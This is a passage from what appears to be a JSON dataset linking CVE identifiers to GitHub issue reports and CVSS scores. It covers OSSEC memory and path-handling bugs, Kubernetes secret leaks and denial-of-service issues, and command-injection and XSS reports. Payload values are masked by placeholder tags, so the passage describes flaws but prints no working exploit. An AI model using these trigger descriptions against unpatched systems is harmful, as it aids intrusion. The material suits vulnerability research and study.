be turned into an out of bounds read of heap memory accessing APITAG or hostname during rule processing if the area pointed to after the syscheck decoder free isn't null terminated. One possible fix would be for the ossecalert decoder to APITAG the APITAG and APITAG before freeing APITAG .",
  62162. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62163. "severity": "CRITICAL",
  62164. "baseScore": 9.8,
  62165. "impactScore": 5.9,
  62166. "exploitabilityScore": 3.9
  62167. },
  62168. {
  62169. "CVE_ID": "CVE-2020-8445",
  62170. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1814",
  62171. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1814",
  62172. "Repo_new": "ossec/ossec-hids",
  62173. "Issue_Created_At": "2020-01-15T20:59:57Z",
  62174. "description": "analysisd: APITAG allows control characters in msg.. The APITAG 's APITAG function doesn't remove or encode terminal control charters or newlines from processed log messages. In many cases those control characters/newline are later logged. There have been cases where allowing arbitrary control characters in log messages has led to command execution with specific terminal emulator implementations. As a result many pieces of software (e.g. Apache HTTPD URLTAG have added escaping of control characters in log messages. It may also be possible to abuse terminal control characters to hide previous messages in a log, tricking system administrators into missing events. Similarly, because newlines ( APITAG ) are permitted in messages processed by APITAG it may be possible to inject nested events to the ossec log. This may result in system administrators being tricked into thinking alerts fired that did not.",
  62175. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62176. "severity": "CRITICAL",
  62177. "baseScore": 9.8,
  62178. "impactScore": 5.9,
  62179. "exploitabilityScore": 3.9
  62180. },
  62181. {
  62182. "CVE_ID": "CVE-2020-8446",
  62183. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1813",
  62184. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1813",
  62185. "Repo_new": "ossec/ossec-hids",
  62186. "Issue_Created_At": "2020-01-15T20:59:40Z",
  62187. "description": "analysisd: syscheck decoder location path injection.. The APITAG 's syscheck decoder ( APITAG ) performs unsafe path handling using the received agent name when trying to get the agent file. The APITAG function uses the agent name unsanitized when building a file name to be used with fopen . URLTAG Processing a syscheck message like APITAG from an agent named test sending from localhost results in an open for APITAG This will fail with ENOTDIR because the part of the path the attacker can't control remotely ( APITAG ) is not a directory. Creating it first by sending a message like APITAG seems like a potential solution at first but won't work because while the file APITAG will be created it won't be created as a directory but a regular file. I suspect this means that the bug is only useful to local attackers (that can write directly to the ossec queue). Writing directly to the queue allows full control of the APITAG used as the agent argument to fopen and can cause the syscheck DB file to be created in an attacker controlled location within the chroot . Remote attackers can not control the full APITAG since the APITAG ensures the prefix of agent name and source IP is always present. Likely the best fix is to use the APITAG function from APITAG on the location filed populated by APITAG and rejecting any values that have a APITAG return from that function.",
  62188. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  62189. "severity": "MEDIUM",
  62190. "baseScore": 5.5,
  62191. "impactScore": 3.6,
  62192. "exploitabilityScore": 1.8
  62193. },
  62194. {
  62195. "CVE_ID": "CVE-2020-8447",
  62196. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1818",
  62197. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1818",
  62198. "Repo_new": "ossec/ossec-hids",
  62199. "Issue_Created_At": "2020-01-15T21:01:03Z",
  62200. "description": "analysisd: APITAG heap use after free decoding syscheck msgs.. The APITAG 's APITAG function calls APITAG at the start of processing a message read from the ossec queue UNIX domain socket. In APITAG the APITAG function populates the lf struct, setting fields like log , hostname and APITAG to substrings of the APITAG buffer. After cleaning any syscheck messages are given to the syscheck decoder for further processing. After processing a syscheck msg from a client the syscheck decoder will free the APITAG pointer in two places. One place is if the message indicated a change in an existing tracked file: URLTAG Another place is if the message indicated a new file to track: URLTAG In both cases the syscheck decoder replaces the existing APITAG and APITAG pointers with pointers to new messages after first freeing the old APITAG . Afterwards the APITAG , and APITAG functions return NUMBERTAG to APITAG . Since the decoder returned NUMBERTAG the APITAG function will continue processing the event, it will not jump to CLMEM : URLTAG If any subsequent processing rules access the APITAG or APITAG fields set by APITAG they will be accessing memory of a freed heap chunk previously containing APITAG . I believe the bug was introduced in APITAG on No NUMBERTAG and affects OSSEC NUMBERTAG This code path is triggerable via an authenticated client through the APITAG . The client needs only write a valid syscheck message that will have the APITAG or hostname set during APITAG . I don't have a strong sense for the possibility of exploitation. I suspect this may be turned into an out of bounds read of heap memory accessing APITAG or hostname during rule processing if the area pointed to after the syscheck decoder free isn't null terminated. One possible fix would be for the syscheck decoder to APITAG the APITAG and APITAG before freeing APITAG .",
  62201. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62202. "severity": "CRITICAL",
  62203. "baseScore": 9.8,
  62204. "impactScore": 5.9,
  62205. "exploitabilityScore": 3.9
  62206. },
  62207. {
  62208. "CVE_ID": "CVE-2020-8448",
  62209. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1815",
  62210. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1815",
  62211. "Repo_new": "ossec/ossec-hids",
  62212. "Issue_Created_At": "2020-01-15T21:00:12Z",
  62213. "description": "analysisd: APITAG segfault processing invalid msg location.. In APITAG the APITAG 's APITAG function handles the location portion of a message differently when the first character after a NUMBERTAG digit ID is APITAG , indicating it came from a remote agent via APITAG . When remote agent locations are processed APITAG tries to null terminate the received location substring of the overall log message to store in APITAG by advancing past the APITAG in the string to the first APITAG character: URLTAG Unfortunately the nesting of strstr as the first argument to strchr on L NUMBERTAG doesn't account for the possibility of a location string that starts with APITAG but doesn't contain a APITAG . E.g. processing the msg APITAG will result in the strstr returning NULL, meaning the strchr call will be APITAG and a segfault will occur. This code was introduced in APITAG on No NUMBERTAG I believe it affects FILETAG . It seems that in all cases APITAG will always write a well formed location into the message it writes to the ossec UNIX domain socket queue because it uses APITAG and populates the locmsg unconditionally: URLTAG URLTAG I believe that means the only way this is triggerable is with direct write access to the socket, and probably makes the exploitability very low. One possible fix is to separate the strstr and return an error when it returns NULL before performing the subsequent strchr with the result pointer.",
  62214. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  62215. "severity": "MEDIUM",
  62216. "baseScore": 5.5,
  62217. "impactScore": 3.6,
  62218. "exploitabilityScore": 1.8
  62219. },
  62220. {
  62221. "CVE_ID": "CVE-2020-8548",
  62222. "Issue_Url_old": "https://github.com/antonreshetov/massCode/issues/44",
  62223. "Issue_Url_new": "https://github.com/antonreshetov/masscode/issues/44",
  62224. "Repo_new": "antonreshetov/massCode",
  62225. "Issue_Created_At": "2020-02-02T05:49:29Z",
  62226. "description": "RCE in APITAG Describe the bug You can use masscode to render the document in markdown but it failed to protect itself from cross site scripting attacks (XSS). Further, it has been identified that in APITAG the flag APITAG is set to true, which leads to a remote code execution issue in masscode Expected behaviour It should not execute APITAG code while rendering the document in markdown Screenshots URLTAG Environment Version NUMBERTAG alpha NUMBERTAG OS version and name: windows NUMBERTAG",
  62227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62228. "severity": "MEDIUM",
  62229. "baseScore": 6.1,
  62230. "impactScore": 2.7,
  62231. "exploitabilityScore": 2.8
  62232. },
  62233. {
  62234. "CVE_ID": "CVE-2020-8548",
  62235. "Issue_Url_old": "https://github.com/antonreshetov/massCode/issues/43",
  62236. "Issue_Url_new": "https://github.com/antonreshetov/masscode/issues/43",
  62237. "Repo_new": "antonreshetov/massCode",
  62238. "Issue_Created_At": "2020-02-01T19:04:27Z",
  62239. "description": "Vulnerability report please contact. Hello, I would like to report a security bug in APITAG Can you please contact me on nikhil. EMAILTAG Best regards, Nikhil",
  62240. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62241. "severity": "MEDIUM",
  62242. "baseScore": 6.1,
  62243. "impactScore": 2.7,
  62244. "exploitabilityScore": 2.8
  62245. },
  62246. {
  62247. "CVE_ID": "CVE-2020-8551",
  62248. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89377",
  62249. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89377",
  62250. "Repo_new": "kubernetes/kubernetes",
  62251. "Issue_Created_At": "2020-03-23T18:34:40Z",
  62252. "description": "CVETAG : Kubelet APITAG via API. CVSS Rating: PATHTAG URLTAG APITAG The Kubelet has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read only API typically served on port NUMBERTAG and the authenticated HTTPS API typically served on port NUMBERTAG Am I vulnerable? If an attacker can make a request to an unpatched kubelet, then you may be vulnerable to this. Affected Versions kubelet NUMBERTAG kubelet NUMBERTAG kubelet NUMBERTAG How do I mitigate this vulnerability? Limit access to the Kubelet API or patch the Kubelet. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Henrik Schmidt /area security /kind bug /committee product security /sig node /area kubelet",
  62253. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  62254. "severity": "MEDIUM",
  62255. "baseScore": 6.5,
  62256. "impactScore": 3.6,
  62257. "exploitabilityScore": 2.8
  62258. },
  62259. {
  62260. "CVE_ID": "CVE-2020-8552",
  62261. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89378",
  62262. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89378",
  62263. "Repo_new": "kubernetes/kubernetes",
  62264. "Issue_Created_At": "2020-03-23T18:35:34Z",
  62265. "description": "CVETAG : apiserver APITAG (oom). CVSS Rating: PATHTAG URLTAG APITAG The Kubernetes API server has been found to be vulnerable to a denial of service attack via authorized API requests. Am I vulnerable? If an attacker can make an authorized resource request to an unpatched API server (see below), then you are vulnerable to this. Prior to NUMBERTAG this was possible via unauthenticated requests by default. Affected Versions kube apiserver NUMBERTAG kube apiserver NUMBERTAG kube apiserver NUMBERTAG How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by: Preventing unauthenticated or unauthorized access to all apis The apiserver should auto restart if it OOMs Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Gus Lees APITAG /area security /kind bug /committee product security",
  62266. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  62267. "severity": "MEDIUM",
  62268. "baseScore": 4.3,
  62269. "impactScore": 1.4,
  62270. "exploitabilityScore": 2.8
  62271. },
  62272. {
  62273. "CVE_ID": "CVE-2020-8553",
  62274. "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/5126",
  62275. "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/5126",
  62276. "Repo_new": "kubernetes/ingress-nginx",
  62277. "Issue_Created_At": "2020-02-19T19:00:32Z",
  62278. "description": "CVETAG : auth type basic annotation vulnerability. A security issue was discovered in ingress nginx versions older than NUMBERTAG The issue is of medium severity, and upgrading is encouraged to fix the vulnerability. Am I vulnerable? The vulnerability exists only if the annotation APITAG type: basic URLTAG is used. How do I upgrade? Follow installation instructions here URLTAG Vulnerability Details A vulnerability has been discovered where a malicious user could create a new Ingress definition resulting in the replacement of the password file. The vulnerability requires that the victim namespace and/or secret use a hyphen in the name. This scenario requires privileges in the cluster to create and read ingresses and also create secrets. This issue is filed as CVETAG . /close",
  62279. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N",
  62280. "severity": "MEDIUM",
  62281. "baseScore": 5.9,
  62282. "impactScore": 5.2,
  62283. "exploitabilityScore": 0.7
  62284. },
  62285. {
  62286. "CVE_ID": "CVE-2020-8554",
  62287. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/97076",
  62288. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/97076",
  62289. "Repo_new": "kubernetes/kubernetes",
  62290. "Issue_Created_At": "2020-12-04T20:02:15Z",
  62291. "description": "RESERVED. Reserved for CVE.",
  62292. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
  62293. "severity": "MEDIUM",
  62294. "baseScore": 5.0,
  62295. "impactScore": 3.4,
  62296. "exploitabilityScore": 1.6
  62297. },
  62298. {
  62299. "CVE_ID": "CVE-2020-8554",
  62300. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/97110",
  62301. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/97110",
  62302. "Repo_new": "kubernetes/kubernetes",
  62303. "Issue_Created_At": "2020-12-07T17:47:04Z",
  62304. "description": "Figure out what to do about external IPs. For CVETAG , URLTAG we decided we couldn't patch it in tree, and instead provided workarounds to disable (or allowlist) the feature through admission controls. Now that the issue is public, I'd like to open the conversation about a long term fix. Unless we missed something (entirely possible), I see a few possible paths forward NUMBERTAG Decide to stop supporting external IPs, deprecate and eventually remove the feature NUMBERTAG Attempt to redesign the external IP feature, deprecate the old behavior, and manage the migration to the new feature NUMBERTAG Accept the current state, and promote the externalip webhook URLTAG to a built in admission controller NUMBERTAG Accept the current state, and support the externalip webhook URLTAG as a long term solution /sig network architecture /area security /priority important soon",
  62305. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
  62306. "severity": "MEDIUM",
  62307. "baseScore": 5.0,
  62308. "impactScore": 3.4,
  62309. "exploitabilityScore": 1.6
  62310. },
  62311. {
  62312. "CVE_ID": "CVE-2020-8555",
  62313. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/91542",
  62314. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/91542",
  62315. "Repo_new": "kubernetes/kubernetes",
  62316. "Issue_Created_At": "2020-05-28T16:13:34Z",
  62317. "description": "Placeholder issue. Placeholder issue, please do not delete.",
  62318. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
  62319. "severity": "MEDIUM",
  62320. "baseScore": 6.3,
  62321. "impactScore": 4.0,
  62322. "exploitabilityScore": 1.8
  62323. },
  62324. {
  62325. "CVE_ID": "CVE-2020-8557",
  62326. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/93032",
  62327. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/93032",
  62328. "Repo_new": "kubernetes/kubernetes",
  62329. "Issue_Created_At": "2020-07-13T18:39:08Z",
  62330. "description": "Placeholder issue. Placeholder issue, please do not delete.",
  62331. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  62332. "severity": "MEDIUM",
  62333. "baseScore": 5.5,
  62334. "impactScore": 3.6,
  62335. "exploitabilityScore": 1.8
  62336. },
  62337. {
  62338. "CVE_ID": "CVE-2020-8558",
  62339. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/92315",
  62340. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/92315",
  62341. "Repo_new": "kubernetes/kubernetes",
  62342. "Issue_Created_At": "2020-06-19T18:38:58Z",
  62343. "description": "Placeholder issue. Placeholder issue, please do not delete.",
  62344. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62345. "severity": "HIGH",
  62346. "baseScore": 8.8,
  62347. "impactScore": 5.9,
  62348. "exploitabilityScore": 2.8
  62349. },
  62350. {
  62351. "CVE_ID": "CVE-2020-8559",
  62352. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/92914",
  62353. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/92914",
  62354. "Repo_new": "kubernetes/kubernetes",
  62355. "Issue_Created_At": "2020-07-08T17:03:16Z",
  62356. "description": "[RESERVED]. This issue is reserved for a future vulnerability announcement. /close",
  62357. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  62358. "severity": "MEDIUM",
  62359. "baseScore": 6.8,
  62360. "impactScore": 5.9,
  62361. "exploitabilityScore": 0.9
  62362. },
  62363. {
  62364. "CVE_ID": "CVE-2020-8561",
  62365. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/104720",
  62366. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/104720",
  62367. "Repo_new": "kubernetes/kubernetes",
  62368. "Issue_Created_At": "2021-09-01T20:18:50Z",
  62369. "description": "TITLE: PLACEHOLDER ISSUE. /triage accepted /lifecycle frozen /area security /kind bug /committee security response",
  62370. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N",
  62371. "severity": "MEDIUM",
  62372. "baseScore": 4.1,
  62373. "impactScore": 1.4,
  62374. "exploitabilityScore": 2.3
  62375. },
  62376. {
  62377. "CVE_ID": "CVE-2020-8562",
  62378. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/101493",
  62379. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/101493",
  62380. "Repo_new": "kubernetes/kubernetes",
  62381. "Issue_Created_At": "2021-04-26T19:18:04Z",
  62382. "description": "PLACEHOLDER ISSUE. /area security /kind bug /committee product security /lifecycle frozen",
  62383. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
  62384. "severity": "LOW",
  62385. "baseScore": 3.1,
  62386. "impactScore": 1.4,
  62387. "exploitabilityScore": 1.6
  62388. },
  62389. {
  62390. "CVE_ID": "CVE-2020-8563",
  62391. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95621",
  62392. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95621",
  62393. "Repo_new": "kubernetes/kubernetes",
  62394. "Issue_Created_At": "2020-10-15T22:00:44Z",
  62395. "description": "CVETAG : Secret leaks in kube controller manager when using APITAG provider. CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using APITAG as a cloud provider, with a logging level set to NUMBERTAG or above, APITAG cloud credentials will be leaked in the cloud controller manager's log. Am I vulnerable? If you are using APITAG as a cloud provider, have verbose logging enabled, and an attacker can access cluster logs, then you may be vulnerable to this. Affected Versions kube controller manager NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to cluster logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek NUMBERTAG area security /kind bug /committee product security",
  62396. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  62397. "severity": "MEDIUM",
  62398. "baseScore": 5.5,
  62399. "impactScore": 3.6,
  62400. "exploitabilityScore": 1.8
  62401. },
  62402. {
  62403. "CVE_ID": "CVE-2020-8564",
  62404. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95622",
  62405. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95622",
  62406. "Repo_new": "kubernetes/kubernetes",
  62407. "Issue_Created_At": "2020-10-15T22:03:19Z",
  62408. "description": "CVETAG : Docker config secrets leaked when file is malformed and log level NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using a logging level of at least NUMBERTAG processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. Am I vulnerable? If APITAG type secrets are used, and a log level of NUMBERTAG or higher is used. Third party tools using PATHTAG to read docker config files may also be vulnerable. Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Nikolaos Moraitis APITAG Hat) /area security /kind bug /committee product security",
  62409. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  62410. "severity": "MEDIUM",
  62411. "baseScore": 5.5,
  62412. "impactScore": 3.6,
  62413. "exploitabilityScore": 1.8
  62414. },
  62415. {
  62416. "CVE_ID": "CVE-2020-8565",
  62417. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95623",
  62418. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95623",
  62419. "Repo_new": "kubernetes/kubernetes",
  62420. "Issue_Created_At": "2020-10-15T22:05:32Z",
  62421. "description": "CVETAG : Incomplete fix for CVETAG allows for token leak in logs when APITAG NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes, if the logging level is set to at least NUMBERTAG authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl . Am I vulnerable? If kube apiserver is using a log level of at least NUMBERTAG Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG alpha2 To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Patrick Rhomberg (purelyapplied) /area security /kind bug /committee product security",
  62422. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  62423. "severity": "MEDIUM",
  62424. "baseScore": 5.5,
  62425. "impactScore": 3.6,
  62426. "exploitabilityScore": 1.8
  62427. },
  62428. {
  62429. "CVE_ID": "CVE-2020-8566",
  62430. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95624",
  62431. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95624",
  62432. "Repo_new": "kubernetes/kubernetes",
  62433. "Issue_Created_At": "2020-10-15T22:07:53Z",
  62434. "description": "CVETAG : Ceph RBD APITAG exposed in logs when loglevel NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using Ceph RBD as a storage provisioner, with logging level of at least NUMBERTAG Ceph RBD admin secrets can be written to logs. This occurs in kube controller manager's logs during provisioning of Ceph RBD persistent claims. Am I vulnerable? If Ceph RBD volumes are in use and kube controller manager is using a log level of at least NUMBERTAG Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek NUMBERTAG area security /kind bug /committee product security",
  62435. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  62436. "severity": "MEDIUM",
  62437. "baseScore": 5.5,
  62438. "impactScore": 3.6,
  62439. "exploitabilityScore": 1.8
  62440. },
  62441. {
  62442. "CVE_ID": "CVE-2020-8567",
  62443. "Issue_Url_old": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384",
  62444. "Issue_Url_new": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384",
  62445. "Repo_new": "kubernetes-sigs/secrets-store-csi-driver",
  62446. "Issue_Created_At": "2020-11-16T17:36:27Z",
  62447. "description": "CVETAG : Plugin directory traversals. CVSS Rating: Medium NUMBERTAG PATHTAG URLTAG Specially crafted APITAG can write to arbitrary file paths on the host filesystem, including APITAG . Am I vulnerable? All supported plugins included this bug. Affected Versions Vault Plugin NUMBERTAG Azure Plugin NUMBERTAG GCP Plugin NUMBERTAG How do I mitigate this vulnerability? Update all plugins to versions that include fixes. Fixed Versions Vault Plugin NUMBERTAG fixed by NUMBERTAG URLTAG Azure Plugin NUMBERTAG fixed by NUMBERTAG URLTAG GCP Plugin NUMBERTAG fixed by NUMBERTAG URLTAG Detection APITAG with APITAG , APITAG or APITAG that includes APITAG",
  62448. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  62449. "severity": "MEDIUM",
  62450. "baseScore": 6.5,
  62451. "impactScore": 3.6,
  62452. "exploitabilityScore": 2.8
  62453. },
  62454. {
  62455. "CVE_ID": "CVE-2020-8568",
  62456. "Issue_Url_old": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378",
  62457. "Issue_Url_new": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378",
  62458. "Repo_new": "kubernetes-sigs/secrets-store-csi-driver",
  62459. "Issue_Created_At": "2020-11-10T23:10:13Z",
  62460. "description": "CVETAG : Secrets sync/rotate directory traversal. CVSS Rating: Medium NUMBERTAG PATHTAG URLTAG Modification of APITAG resource could result in writing content to the host filesystem and syncing file contents to Kubernetes Secrets. This includes paths under APITAG that contain other Kubernetes Secrets. Am I vulnerable? The attacker must have permissions to update or patch the APITAG resources which is not granted by default and the auto rotations feature must be enabled which is also not enabled by default. Affected Versions NUMBERTAG How do I mitigate this vulnerability? Do not grant users or workloads permissions to modify APITAG resources. Upgrade the driver to NUMBERTAG or above which include additional verifications on the APITAG field. Fixed Versions NUMBERTAG fixed by NUMBERTAG URLTAG Detection N/A",
  62461. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  62462. "severity": "MEDIUM",
  62463. "baseScore": 6.5,
  62464. "impactScore": 5.2,
  62465. "exploitabilityScore": 1.2
  62466. },
  62467. {
  62468. "CVE_ID": "CVE-2020-8569",
  62469. "Issue_Url_old": "https://github.com/kubernetes-csi/external-snapshotter/issues/380",
  62470. "Issue_Url_new": "https://github.com/kubernetes-csi/external-snapshotter/issues/380",
  62471. "Repo_new": "kubernetes-csi/external-snapshotter",
  62472. "Issue_Created_At": "2020-09-29T13:00:51Z",
  62473. "description": "snapshot controller panics when source PVC does not exist. When taking a snapshot of a non existing PVC, snapshot controller panics: ERRORTAG To reproduce this, the APITAG must not have a APITAG CODETAG",
  62474. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  62475. "severity": "MEDIUM",
  62476. "baseScore": 6.5,
  62477. "impactScore": 3.6,
  62478. "exploitabilityScore": 2.8
  62479. },
  62480. {
  62481. "CVE_ID": "CVE-2020-8570",
  62482. "Issue_Url_old": "https://github.com/kubernetes-client/java/issues/1491",
  62483. "Issue_Url_new": "https://github.com/kubernetes-client/java/issues/1491",
  62484. "Repo_new": "kubernetes-client/java",
  62485. "Issue_Created_At": "2021-01-11T23:09:47Z",
  62486. "description": "CVETAG : Path Traversal bug in the Java Kubernetes Client. There is a defect in the copy implementation in APITAG that was fixed in NUMBERTAG The summary of the issue is that if you copy a file from a malicious pod with a specially crafted tarball, it may extract to any file that your user has permission to write. This issue was fixed in release APITAG , APITAG and APITAG users are strongly encouraged to upgrade to those versions.",
  62487. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  62488. "severity": "CRITICAL",
  62489. "baseScore": 9.1,
  62490. "impactScore": 5.2,
  62491. "exploitabilityScore": 3.9
  62492. },
  62493. {
  62494. "CVE_ID": "CVE-2020-8645",
  62495. "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/9",
  62496. "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/9",
  62497. "Repo_new": "niteosoft/simplejobscript",
  62498. "Issue_Created_At": "2020-01-19T13:01:39Z",
  62499. "description": "FILETAG",
  62500. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62501. "severity": "CRITICAL",
  62502. "baseScore": 9.8,
  62503. "impactScore": 5.9,
  62504. "exploitabilityScore": 3.9
  62505. },
  62506. {
  62507. "CVE_ID": "CVE-2020-8654",
  62508. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/50",
  62509. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/50",
  62510. "Repo_new": "eyesofnetworkcommunity/eonweb",
  62511. "Issue_Created_At": "2020-02-05T13:27:51Z",
  62512. "description": "Execution de commandes arbitraires sur le module APITAG Bonjour, Il est possible d\u2019ex\u00e9cuter des commandes arbitraires sur le syst\u00e8me d'exploitation pour un utilisateur d'EON ayant les droits suffisants pour utiliser le module APITAG Le champ APITAG n'est pas filtr\u00e9 et il est possible d\u2019ex\u00e9cuter des commandes arbitraires. Voici un exemple de valeur de Target ex\u00e9cutant la commande id sur le syst\u00e8me: APITAG R\u00e9sultat obtenu: FILETAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel.",
  62513. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62514. "severity": "HIGH",
  62515. "baseScore": 8.8,
  62516. "impactScore": 5.9,
  62517. "exploitabilityScore": 2.8
  62518. },
  62519. {
  62520. "CVE_ID": "CVE-2020-8655",
  62521. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonconf/issues/8",
  62522. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonconf/issues/8",
  62523. "Repo_new": "eyesofnetworkcommunity/eonconf",
  62524. "Issue_Created_At": "2020-02-05T13:40:03Z",
